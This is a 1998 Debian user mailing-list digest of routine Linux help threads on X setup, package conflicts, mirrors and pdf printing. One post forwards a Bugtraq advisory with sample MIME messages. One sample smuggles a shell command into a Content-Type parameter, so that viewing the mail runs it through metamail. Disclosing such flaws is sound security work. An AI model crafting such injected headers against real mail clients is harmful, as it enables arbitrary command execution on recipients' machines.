 if it should retry.  Well, of course I want it to retry.  I hit it manually,
 and it finished (with a few more hangs), but I lost several hours of time
 waiting (when I could have been sleeping!)
 
   Any way to configure this?
 
   Thanks,
   -Brent
 

In place of editing yourself the ftp method, not really ;) Take a look
around line 300 of /usr/lib/dpkg/ftp/install (but take care to make a
backup first and change only thing that you understand!)

BTW, apt will have a more easy of doing this... wait a little and
remember that when a program ask you something, it's because the
programmer think they are no Always Good Answer [TM] (Like why xv over
libmagick? libmagick rules! ;)

Good Hacking!
Fab (who begin to write before thinking...)

-- 

Fabien Ninoles
E-mail: [EMAIL PROTECTED]
WebPage: http://www.callisto.si.usherb.ca/~94246757
You can get my public key from your nearest public keys server!
RSA PGP KEY [E3723845]: 1C C1 4F A6 EE E5 4D 99  4F 80 2D 2D 1F 85 C1 70



pgpFTTWxlBwp9.pgp
Description: PGP signature


Linux freeform text database

1998-04-07 Thread Damon Muller
Hi Debmeisters,

This isn't specificically a Debian question, but I'm hoping that the
combined knowledge locked up in this group might be able to point me in the
right direction...

I've recently acquired myself a little old laptop, which, with help from
the group, is now loaded up and chugging along with Debian installed on it.
This year I'm also doing my Masters, and so I'm going to have to be keeping
track of a whole lot of literature and ideas and things like that. I've
decided that my brain isn't up to the task, so I might need a bit of
software help :)

What I'm basically looking for is something along the lines of a freeform
text database that will run under Linux (prefereable GPL'd or Freeware).
Another possibility is DOSEMU, but native linux would be the prefered choice.

Something which I can just use as a searchable cardfile or something like
that would be good, but I have yet to find something like that that'll work
under linux. I have got edb, which is a database that runs under emacs, but
i'm not yet sure if that's really what I'm after. Also do know if I can be
bothered working out how to create a new database (am I the only one who
can't remember a million M-x emacs commands?).

Surely there must be something like this around? I can't be the only linux
user who has ever thought something like this would be A Good Thing. Any
advice, tips, pointers, or anything like that would be greatly appreciated!

Thanks,

damon



Damon Muller ([EMAIL PROTECTED])
Web Page:   www.sub.net.au/~tr  It's not a sense of humor. It's
ICQ UIN:2920281 a sense of irony disguised as one.
PGP Key ID: 0x232C09E1   - Bruce Sterling


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


HTTP mirror of non-us??

1998-04-07 Thread William R. Ward
The script I use to download .deb files uses libwww-perl, which is
apparently not very effective for FTP connections.  I typically get
speeds of 2-2.5 kB/s using HTTP and 0.3 using FTP (this is over a 2.88
kB/s connection).  Is there an HTTP site where I can download non-us
packages?  The only site I know of is ftp://nonus.debian.org.  (I
download my regular hamm files from http://www.cdrom.com)

Any help would be most appreciated.  Also, is there any hope of
convincing the owners of www.debian.org to include a mirror of
ftp.debian.org on their HTTP server?

--Bill.

-- 
William R Ward  Bay View Consulting   http://www.bayview.com/~hermit/
[EMAIL PROTECTED] 1803 Mission St. #339voicemail +1 408/479-4072
[EMAIL PROTECTED]   Santa Cruz CA 95060 USA   pager +1 408/458-8862
 PGP Key 0x2BD331E5; Public key at http://www.bayview.com/~hermit/pubkey.txt
-
Never doubt that a small group of thoughtful, committed citizens can change
 the world.  Indeed, it's the only thing that ever has. -- Margaret Mead


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Green Monitors

1998-04-07 Thread Michael Beattie
On Wed, 1 Apr 1998, Lindsay Allen wrote:

 
 Here is a message on the subject which I saved some time back.
 

[snip]
   echo -n Setting DPMS for text console: 
   setterm -blank 5 -powersave on  # dpms on
   echo -en \033[9;8]# suspend after 10 min
   echo -en \033[14;10]  # off after 30 min
   echo done.

[snip]

Where can one find info/docs on the usage of this escape sequence? i.e. to
change the length of time for suspend/off???


   Michael Beattie ([EMAIL PROTECTED])

---
   Bother, said Pooh, as he fell into the liquid iron ore crucible
---
Debian GNU/Linux  Ooohh You are missing out!


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Intallationproblems

1998-04-07 Thread Joop
 Hallo,
 at first please excuse my very bad english, but i have a big problem
 by installing the DEBIAN-Linux on my new Pentium.
 
 In the last years i have used a 486DX2/80  machine with 32 MB RAM. Its
 works very good. There ar no problems with Linux.
 
 Now i have additional an Pentium 166 with 32MB RAM too. Win95 and Win
 NT and OS/2 are working verry good. If i trial to install my
 Debian-Linux with a Boot-Disk (extractet from the CD) the machine will
 break this booting after the Message now booting the kernel .
 The machine goes down and starts a new booting with exact the same
 Process. This will never end.
 

My guess is that your new machine has a hardware
configuration that cannot be handled by a 2.0.33
kernel. You would have to build yourself a
kernel from the 2.1.x series, but if you have
never done this, it can be a bit difficult...

 I have a ATAPI CDROM, a Soundcard, an Floppystreamer, a Modem 
 an an Interface for an Handscanner in the machine. The BIOS in nomaly
 configurated. The same effects i will have with every other
 Linux-Disribution from other vendors.
 
 If there is someone who can help my, please send an email to 
 [EMAIL PROTECTED]
 
 Thanks
 **
   Uwe Forner
 Meisterstrasse 9, 07381 Poessneck
   Dipl.-Ing.-Oekonom
  Tel. u. Fax: +49 03647-415024
  eMail: [EMAIL PROTECTED]
  http://home.t-online.de/home/uwe.forner
 **
 
 
 --

Joop

[EMAIL PROTECTED]
 To UNSUBSCRIBE, email to [EMAIL PROTECTED]
 with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
 
 


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: HTTP mirror of non-us??

1998-04-07 Thread Jason Gunthorpe

On Mon, 6 Apr 1998, William R. Ward wrote:

 The script I use to download .deb files uses libwww-perl, which is
 apparently not very effective for FTP connections.  I typically get
 speeds of 2-2.5 kB/s using HTTP and 0.3 using FTP (this is over a 2.88
 kB/s connection).  Is there an HTTP site where I can download non-us
 packages?  The only site I know of is ftp://nonus.debian.org.  (I
 download my regular hamm files from http://www.cdrom.com)
 
 Any help would be most appreciated.  Also, is there any hope of
 convincing the owners of www.debian.org to include a mirror of
 ftp.debian.org on their HTTP server?

There are over 13 http mirrors and about 4 non-us ones.

Try http://ftp.de.debian.org/debian-non-US/stable/binary-i386

Check the mailing list archives of debian-www for a more complete list.
 
Jason


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Trouble installing dump_0.4b4-6.deb

1998-04-07 Thread William R Ward

This is the error I get 

(Reading database ... 35660 files and directories currently installed.)
Preparing to replace dump 0.4b4-4 (using .../utils/dump_0.4b4-6.deb) ...
Unpacking replacement dump ...
dpkg: error processing /news/debian/hamm/main/binary-i386/utils/dump_0.4b4-6.d 
(--install):
 trying to overwrite `/usr/man/man8/rmt.8.gz', which is also in package cpio
[]

Why is this file in both dump and cpio packages?

--Bill.

-- 
William R Ward  Bay View Consulting   http://www.bayview.com/~hermit/
[EMAIL PROTECTED] 1803 Mission St. #339voicemail +1 408/479-4072
[EMAIL PROTECTED]   Santa Cruz CA 95060 USA   pager +1 408/458-8862
 PGP Key 0x2BD331E5; Public key at http://www.bayview.com/~hermit/pubkey.txt
-
Never doubt that a small group of thoughtful, committed citizens can change
 the world.  Indeed, it's the only thing that ever has. -- Margaret Mead


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: HTTP mirror of non-us??

1998-04-07 Thread William R. Ward
In article [EMAIL PROTECTED], Jason Gunthorpe [EMAIL PROTECTED] writes:
 Try http://ftp.de.debian.org/debian-non-US/stable/binary-i386

Great, thanks!

 Check the mailing list archives of debian-www for a more complete list.
 
I've never heard of debian-www; is that also on lists.debian.org?

--Bill.

-- 
William R Ward  Bay View Consulting   http://www.bayview.com/~hermit/
[EMAIL PROTECTED] 1803 Mission St. #339voicemail +1 408/479-4072
[EMAIL PROTECTED]   Santa Cruz CA 95060 USA   pager +1 408/458-8862
 PGP Key 0x2BD331E5; Public key at http://www.bayview.com/~hermit/pubkey.txt
-
Never doubt that a small group of thoughtful, committed citizens can change
 the world.  Indeed, it's the only thing that ever has. -- Margaret Mead


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


pdf to ps

1998-04-07 Thread Ulisses Alonso Camaro
Hi!

I have tried to print/convert to ps with acroread (levels 1 and 2) but it
generates a ps that is not understand by gs, so I can't view it or print.

The documents looks good with acroread but with xpdf I can only see the
first page, If I print it it prints with a different paper rather than a4

I have not seen any switch to xpdf to change that setting...

Any comment will be greatly appreciated,

Thanks in advance,

Ulisses

PD: I'm using 1.3.1 (bo)


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


awk or sed?

1998-04-07 Thread A. M. Varon
Hi,

[Sorry if this is off-topic.]

I have two files say, file1 and file2

file1 contains:file2 contains:
alpha  alpha
bravo
charlie

What I want to do is compare the two files, and delete the contents of
file1 according to file2. So, from the above, I'll have to delete the word
alpha from file1. Can it be possible using sed? or awk?

thanks,

== == Andre M. Varon  Lasaltech Incorporated
== == Technical Head  Fax-Tel: (034)435-0836
== = ==
==== ==   E-mail  : [EMAIL PROTECTED]
 ==   WebPage : http://andre.lasaltech.com


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: pine

1998-04-07 Thread Joerg Friedrich
On Mon, 6 Apr 1998, Usman Roshan wrote:

 Hello everybody,  
  Does anyone know how to create filters in pine ? Thanks.

use procmail, i.e.

---
Heute ist nicht alle Tage, ich komme wieder, keine Frage!!!

   Joerg


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: pdf to ps

1998-04-07 Thread E.L. Meijer \(Eric\)
 
 Hi!
 
 I have tried to print/convert to ps with acroread (levels 1 and 2) but it
 generates a ps that is not understand by gs, so I can't view it or print.
 
 The documents looks good with acroread but with xpdf I can only see the
 first page, If I print it it prints with a different paper rather than a4
 
 I have not seen any switch to xpdf to change that setting...
 
 Any comment will be greatly appreciated,

You can handle pdf files directly with the more recent versions of
gs-aladdin, which is in non-free.  I am using version 5.03-0.99 on bo
systems.  I suppose that in some time the free gs will catch up on this
capability.  Comments anyone?

Eric Meijer

-- 
 E.L. Meijer ([EMAIL PROTECTED])  | tel. office +31 40 2472189
 Eindhoven Univ. of Technology | tel. lab.   +31 40 2475032
 Lab. for Catalysis and Inorg. Chem. (TAK) | tel. fax+31 40 2455054


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: awk or sed?

1998-04-07 Thread A. M. Varon
On Tue, 7 Apr 1998, George Bonser wrote:

  What I want to do is compare the two files, and delete the contents of
  file1 according to file2. So, from the above, I'll have to delete the word
  alpha from file1. Can it be possible using sed? or awk?
 
 Hehe, try grep!
 
 grep -vFf file2 file1

Wow, a question to an answer in 3 minutes! that's very fast thanks.

regards,

== == Andre M. Varon  Lasaltech Incorporated
== == Technical Head  Fax-Tel: (034)435-0836
== = ==
==== ==   E-mail  : [EMAIL PROTECTED]
 ==   WebPage : http://andre.lasaltech.com


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


RE: mailrc and pine security holes

1998-04-07 Thread Andreas Mueller
hi 

only 4 info :)

-Forwarded message from Michal Zalewski [EMAIL PROTECTED]-
Sender: Bugtraq List [EMAIL PROTECTED]
From:   Michal Zalewski [EMAIL PROTECTED]
Subject:  mailrc and pine security holes
To: [EMAIL PROTECTED]

Many of mailcap-compatible unix mail clients have several security holes.
Mailcap mechanism is usually so poorly implemented that it's possible
to perform wida range of attacks - from 'harmless' messing on screen,
through executing specific commands with arbitrary parameters,
even to executing *arbitrary* commands via e-mail message.

Here are examples, both tested under Linux RH 5.0 distribution (mailcap
1.0.6, pine 3.96):



Example 1 (light) - pine 3.96 confusion
===

Following example demostrates how to cause a few 'mostly harmless'
errors due to the improper expansion of ` character by pine - it's
just annoying, because you can't view this mail properly, but I
have no idea if it's exploitable:

 SAMPLE MIME MESSAGE 
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary==_NextPart_000_0007_01BD5F09.B6797740

--=_NextPart_000_0007_01BD5F09.B6797740
Content-Type: text/plain;
charset=crashme`
Content-Transfer-Encoding: quoted-printable

Hellow!

--=_NextPart_000_0007_01BD5F09.B6797740--
 END OF EXAMPLE ***


===
Example 2 (heavy) - execution of arbitrary code
===

That's something even more dangerous - following MIME mail, when viewed,
executes 'touch /tmp/BIG_HOLE' (bug lies in metamail script):

 SAMPLE MIME MESSAGE 
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary==_NextPart_000_0007_01BD5F09.B6797740

--=_NextPart_000_0007_01BD5F09.B6797740
Content-Type: default;
encoding=\\\x ==\ \\\x \)\ touch\ \/tmp/BIG_HOLE
Content-Transfer-Encoding: quoted-printable

Hellow!!!

--=_NextPart_000_0007_01BD5F09.B6797740--
 END OF EXAMPLE 

___
Michal Zalewski [EMAIL PROTECTED] = finger for pub PGP key
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
[echo \$0\$0_;chmod +x _;./_] =--= [tel +48 (0) 22 813 25 86]

-End of forwarded message-

-- 
Grusz 
Andreas
~~~
|Andreas Mueller  Akdeniz-Koleji  |
|System-Administrator  [EMAIL PROTECTED]|
|Konyaalti Cad. Gündüz Apt. 19/15 07050 Antalya Work-Phone:0090-242-2481880|
|privat: [EMAIL PROTECTED]  Privat: 0090-242-2482402   |
~~~
PGP Key Fingerprint = 58 BD 95 55 34 18 29 E8  AD 88 58 64 1F A4 7A 38


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Problems creating a bootable Debian installation on a Jaz drive (fwd)

1998-04-07 Thread E.L. Meijer \(Eric\)
 
 
 
 Hello all --
 
 I have recently been trying to make a bootable Debian installation on a
 Jaz drive.  I did this by using 'cp -a' to transfer files from my scsi
 hard drive to the Jaz drive.  I then changed the Jaz drive version of 
 /etc/fstab so that it would mount /dev/sdb1 (the jaz drive) as / and 
 commented out the mount lines for the normal scsi hard drive / and
 /home partitions.  I made a boot floppy for this configuration (copied
 vmlinuz to a temporary location, used rdev to set the root device as
 /dev/sdb1 on the temporary copy, then used dd to transfer that copy to
 a floppy).  The problem is /proc -- I have tried three different things 
 with it, and all have their problems...

 1.) If I cp -a the whole /proc directory to the Jaz drive, the boot (with
 the boot floppy using /dev/sdb1 as the root partition) will proceed okay
 until the initial login prompt.  Then it basically freezes, and after a
 wait, starts producing lines like the following:

Don't copy the contents of /proc.  It is not a normal filesystem.  The
`files' that it shows are actually a fancy interface to the kernel,
they do not exist anywhere on a disk.  You have to have a directory
/proc though.  The proc file system is used by programs such as top and
ps.


 
 scsi: aborting command due to timeout: ...
 
 at which point it is necessary to push the reset button and restart the
 machine, and boot into the Linuz which used the scsi hard drive as the
 root partition.
 
 2.) If I make a /proc directory on the Jaz drive, but do not copy the
 contents of /proc from my hard drive to the Jaz drive, the same happens
 as above, except that it doesn't get all the way to the prompt before
 the scsi timeouts start; it gets through the lines about starting sshd,
 then does what I described above.  (If it helps, in a normal boot, the
 next lines printed out at boot time after the one about sshd are
 ones concerning starting remote file services and such.)
 
 3.) If I totally ignore doing anything about the /proc directory on
 the Jaz, the boot will proceed and will get to the prompt okay, but
 will complain during the boot process.  For example, after the message
 about checking the root file system, it will print out the following:

[ apparently many programs use /proc in some way or other ]

My advice would be to compile a new kernel (make-kpkg) that includes the
proc file system, not as a module, and then see what happens.

Eric Meijer

-- 
 E.L. Meijer ([EMAIL PROTECTED])  | tel. office +31 40 2472189
 Eindhoven Univ. of Technology | tel. lab.   +31 40 2475032
 Lab. for Catalysis and Inorg. Chem. (TAK) | tel. fax+31 40 2455054


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


exim 1.90-2: eximconfig doesn't work.

1998-04-07 Thread Alan Eugene Davis

I had to back out of exim 1.90-2 because the eximconfig script 
bombed.  I don't know why, but when I installed 1.89.1-1, the script
ran perfectly.  

This is by leaps and bounds the easiest mail transport agent I have
yet to install.  I don't know yet whether it works: I'm encouraged.  
Eximon requires some gymnastics I guess, unless one runs X as root.

Alan 

-- 
Alan E. Davis   Marianas High School (Science Department)   
  
AAA196, Box 10001[EMAIL PROTECTED]   http://www.saipan.netpci.com/~adavis   
Saipan, MP  9695015.16oN 145.7oEGMT+10   Northern Mariana Islands


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Debian-Announce gone?

1998-04-07 Thread Frank Barknecht

Hallo all,
what has happend to the debian-announce-mailing-list? Since Bruce left, I 
have not seen any announcments made to this list. Is it dead now? Where then
can I get the latest news about debian in a similar form ( = low volume list, 
only the important news, rumors 'n' stuff like e.g. Next Debian Version will 
be called 'Slink')
Bye,
-- 
a href=http://www.einblick.de/;
  Frank Barknecht   Das Koelner Stadt- und Unimagazin
  -   /a


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


LibICE and general X install

1998-04-07 Thread Tristan Day
When trying to install lib6 and many x-related packages to get x running, I
keep being unable to install them, as dpkg tells me that I haven't got
libICE something-or-other. I looked thru www.debian.org/packages and can't
find it.

Also one of the packages says it needs ccp whatever that is.

Also, when I'm trying to install xserver (the S3 version) I'm told it can't
find a mouse at /dev/mouse because it doesn't exist. I know it doesn't but
don't know how to get it...

Plus, whenever trying to run xdm the screen completely packs in and I have
to reboot.

I'm told I should run XF86Setup but it says it's not there despite
instructions in x's doc files.

Basically x won't install at all.




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Where did my init.d/boot go?

1998-04-07 Thread vandeveb
Since hamm was frozen, I started the process of updating my bo system.
I've been running hamm now for a week or so, and using FTP to update all of my 
out-of-date
packages.
Last night I installed some of the new packages, ( of which the only important 
one I remember
was sysvinit ), and when I rebooted my system, I was no longer able to open a 
tty, and thus 
even though I logged in, and Linux validated my password, it was unable to give 
me a shell.

After examining the boot messages, and seeing a line that said 'unable to find 
/etc/init.d/boot',
I booted up from a beautiful little slackware rescue disk, and saw that my boot 
was now boot.OLD.

How do I find out what package did this?

I assume that whatever package moved my boot to boot.OLD, was intending to 
write a new file.
Do I need this new boot file?  My system seems to be running fine w/ my old 
boot.


Bill Van Devender


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: weird menu problem

1998-04-07 Thread Michael Beattie
On Mon, 6 Apr 1998, Hamish Moffatt wrote:

 I just installed the fvwmconf package, which includes a menu
 entry /usr/lib/menu/fvwmconf, which looks fine to me, but it hasn't
 made it into menudefs.hook for fvwm2 or fvwm95. Just to be sure
 I can update-menus again as root and it still didn't make it.
 
 Why might this happen?

There was a recent thread on this, check the files in /etc/menu-methods I
think it was to do with execution bits.. I have:

-rw-r--r--   1 root root  386 May 15  1997 README
-rwxr-xr-x   1 root root 2390 May  6  1997 afterstep
-rwxr-xr-x   1 root root 2736 May  8  1997 fvwm2
-rwxr-xr-x   1 root root 2579 Jan  5  1997 fvwm95
-rwxr-xr-x   1 root root 1139 Mar 24  1997 pdmenu
-rw-r--r--   1 root root 1233 May 15  1997 translate_menus

Hope this helps..

   Michael Beattie ([EMAIL PROTECTED])

---
If you don't know where you want to go, we'll make sure you get taken.
  -Japanese Microsoft ad slogan translated back into English
---
Debian GNU/Linux  Ooohh You are missing out!


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


create a distrib using Debian

1998-04-07 Thread Julien Ortega
I want to include in a debian distrib some programs, configs etc..
If i can do that i would like to make an CD to install this version on
my computers.
Do you have HOWTOs, URLs or other that can explain me how to do ?
-- 
Julien Ortega -- EXTERN
e-mail: [EMAIL PROTECTED]


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


again: pdf to ps (gs-aladdin)

1998-04-07 Thread Ulisses Alonso Camaro
Hi all again!

First of all thanks for your reply

In a mistake I delete your last mail, so I'm not sure if you talked about
5.* version of gs-aladdin in bo distribution


I have no found a newer version of gs aladdin than 4.03-7 from the non-free 
directory,
this still have problems to handle directly pdf

Do you have a gs-aladdin compiled for libc5?
Can you send me it?

Why the ps generated (level 1 and 2) by acreread can't be read by gs?


any comment will be greatly appreciated,


Ulisses






--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: LibICE and general X install

1998-04-07 Thread Oliver Elphick
Tristan Day wrote:
  When trying to install lib6 and many x-related packages to get x running, I
  keep being unable to install them, as dpkg tells me that I haven't got
  libICE something-or-other. I looked thru www.debian.org/packages and can't
  find it.

libICE.so is in xlib6 (for libc5) or xlib6g (for libc6); you might also
need xlib6g-dev or xlib6-altdev.  If you're running all bo (Debian 1.3.1),
you probably need xlib6 and xlib6-dev.

  Also one of the packages says it needs ccp whatever that is.

I've never heard of that.  Do you happen to mean cpp (which is in gcc)?

  Also, when I'm trying to install xserver (the S3 version) I'm told it can't
  find a mouse at /dev/mouse because it doesn't exist. I know it doesn't but
  don't know how to get it...

/dev/mouse does not exist unless you create it.  If present, it is a symbolic
link to the device where your mouse really is: /dev/ttyS0, /dev/psaux or
whatever.

To create it: ln -s /dev/wherever_it_is /dev/mouse

  Plus, whenever trying to run xdm the screen completely packs in and I have
  to reboot.
  
  I'm told I should run XF86Setup but it says it's not there despite
  instructions in x's doc files.

XF86Setup is in xserver-vga16

  Basically x won't install at all.

Have you installed all necessary packages?

You need at least: xbase xserver-vga16 xserver-your_video_card_type xlib6 
   xfntbase 

-- 
Oliver Elphick[EMAIL PROTECTED]
Isle of Wight  http://www.lfix.co.uk/oliver

PGP key from public servers; key ID 32B8FAA1



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Printing with an old tractor

1998-04-07 Thread Johan Wilhelm Kluwer
Hello,

I have a problem that should have a really simple answer that I
nevertheless have not been able to find. I have an old, powerweak computer
into which I have just been able to fit emacs and latex. This works fine,
but: How to print DVI files? The printer I dispose of is an old Citizen
dot-matrix, I suppose 180 DPI.

I could theoretically use ghostscript for printing, but I'm confident that
that would be *very slow indeed*.

Is there a slimmer way of getting DVI files onto a dot-matrix printer?


Best,

Johan W. Klüwer.




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: cc:Mail Link to SMTP Undeliverable Message

1998-04-07 Thread Carey Evans
Ossama Othman [EMAIL PROTECTED] writes:

 Everytime I send a message to the Debian list, I get the below response
 from [EMAIL PROTECTED]  However, in all cases I sent no Cc or message 
 to France (fr, right?)  Suggestions?

Most likely, [EMAIL PROTECTED] is subscribed to debian-user, but the
address is now invalid.  cc:Mail is wrongly bouncing the email to the
From: header, rather than the envelope sender of the message.  (Which
is like the postal service opening your letter and throwing away the
envelope before trying to work out where to return it when the address 
is wrong.) 

You've got a few options, including writing to the sender and
complaining about the brokenness of cc:Mail, and forwarding a copy to
the listmaster address at the bottom of this email to see if they can
unsubscribe the user manually.

-- 
 Carey Evans  http://home.clear.net.nz/pages/c.evans/

[UNIX] appears to have the inside track on being the replacement for
  CP/M on the largest microcomputers (e.g. those based on 68000...)


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Where did my init.d/boot go?

1998-04-07 Thread Mirek Kwasniak
On Mon, Apr 06, 1998 at 11:42:50PM -0500, [EMAIL PROTECTED] wrote:
 Since hamm was frozen, I started the process of updating my bo system.
 I've been running hamm now for a week or so, and using FTP to update all
 of my out-of-date packages. Last night I installed some of the new
 packages, ( of which the only important one I remember was sysvinit ), and
 when I rebooted my system, I was no longer able to open a tty, and thus
 even though I logged in, and Linux validated my password, it was unable to
 give me a shell.
 
 After examining the boot messages, and seeing a line that said 'unable to
 find /etc/init.d/boot', I booted up from a beautiful little slackware
 rescue disk, and saw that my boot was now boot.OLD.
 
 How do I find out what package did this?
 
 I assume that whatever package moved my boot to boot.OLD, was intending to
 write a new file. Do I need this new boot file?  My system seems to be
 running fine w/ my old boot.
 

Your install is broken by buggy grep 2.1-6.
I got the same result but I upgrade a copy of my system :)
Get grep 2.1-7 and maybe reinstall all packages by hand (whith: dpkg -i).

Mirek


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: again: pdf to ps (gs-aladdin)

1998-04-07 Thread jdassen
On Tue, Apr 07, 1998 at 01:07:30PM +0200, Ulisses Alonso Camaro wrote:
 Do you have a gs-aladdin compiled for libc5?

ftp://ftp.debian.org/debian/bo-unstable/binary-i386/gs-aladdin_5.10-2bo3.deb

HTH,
Ray
-- 
PATRIOTISM  A great British writer once said that if he had to choose 
between betraying his country and betraying a friend he hoped he would
have the decency to betray his country.  
- The Hipcrime Vocab by Chad C. Mulligan 


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Hard Disk Size

1998-04-07 Thread Ossama Othman
Hi,
 
  As a thought, if Linux couldn't handle large filesystems I don't anyone
  would have bothered implementing RAID for Linux.  :)
 
  It's already done. I'm running here with 2 0.5GB scsi disks as RAID-0
  with /var mounted there. Also something like 20+20mb swap partitions 
  on those drives - improves the systems responsivity a lot. 

Yes, I know.  I was merely trying to show the person I was responding to
that Linux can handle large filesystems and drives.:)

Thanks anyway,
-Ossama



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


SyQuest internal IDE 1GB disk?

1998-04-07 Thread Rick Macdonald
I imagine that SyQuest's external parallel port drive isn't supported
under Linux, but what about the internal IDE version?

Does anybody have experience with these drives? They're nearly half the
price of Jaz drives. Seems like a good alternative to tape for backup,
and a nice place to keep my Debian mirror.

-- 
...RickM...


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


RE: SyQuest internal IDE 1GB disk?

1998-04-07 Thread Jeremy Malcolm
-BEGIN PGP SIGNED MESSAGE-

 I imagine that SyQuest's external parallel port drive isn't
supported
 under Linux

Actually, it is.  See my earlier message.  If you're using 1.3.1,
you'll need to load kernel modules from http://www.torque.net/linux
pp.html, if you're using anything more recent then the kernel has the
capacity to support parallel port drives without any additional
modules required.

 but what about the internal IDE version?

Yes, it too.  It's just a plain ATAPI/IDE drive as far as Linux is
concerned.

- -- 
|-  JEREMY MALCOLM [EMAIL PROTECTED]  -|
SIG of the day: [ ] Contact  [ ] Web  [ ] PGP  [x] Taglines #1  [ ] #2
Reality is for those who can't face science fiction. | Power corrupts;
absolute power is kind of neat. | It's in Tibetan! - The Doctor (5G)
A lawyer is like a river. - Kosh | Life is like a simile | Dynsdale!

-BEGIN PGP SIGNATURE-
Version: PGP for Business Security 5.5

iQB1AwUBNSm2K7/mBljD2JABAQHXyAMAjJpugJMOTo6ZZg/FnOpfvCYSd88yx6wN
V8BnYDlu1QizsAqPCPYcIdM9ZsrnUalBj5pcYW2hG+m6f0xyitCAWOItnHwVvvnd
UPRG7SCRNKv9YOLWPQbXZSRCoefqFTYE
=0k+X
-END PGP SIGNATURE-


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: create a distrib using Debian

1998-04-07 Thread Daniel Martin at cush
Julien Ortega [EMAIL PROTECTED] writes:

 I want to include in a debian distrib some programs, configs etc..
 If i can do that i would like to make an CD to install this version on
 my computers.
 Do you have HOWTOs, URLs or other that can explain me how to do ?

Well, I suggest you look at what scripts debian uses to make its CDs;
these are in the debian-cd package.  At the very least, you'll also
need to install the mkisofs (for making CD images) and syslinux (for
making bootable disk images, which you need to make bootable CDs) 
packages.


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Linux freeform text database

1998-04-07 Thread Mike Miller
I've used a thing called grok some, but not extensively.  It may
be just what you are looking for.  From the help intro:

 Grok is a program to present unstructured data in a
 row/column format using an index card paradigm. Each
 database row (line) is a card; each database column (field)
 is an item in the card. Items can be presented in the card
 as various types and shapes. The presentation of a database
 is determined by a form.

The forms can be easily edited with a graphic layout tool.  It
comes with a couple of examples.  It runs well under linux and
other unix systems, which is a big plus for me.  There is not
currently a debian grok package, but there are linux binaries
available.  There's info at
URL:http://www.in-berlin.de/User/bitrot/grok.html.

Regards, Mike

-- 
Michael A. Miller[EMAIL PROTECTED]
  Department of Physics, University of Illinois, Urbana-Champaign
  PGP public key available on request


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


Re: Threading list subjects?

1998-04-07 Thread Mike Miller
I use Gnus - a powerful, customizable news- and mail-reading part
of emacs (and xemacs).  It will thread, score, sort and do just
about anything you want to your mail.

Mike


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
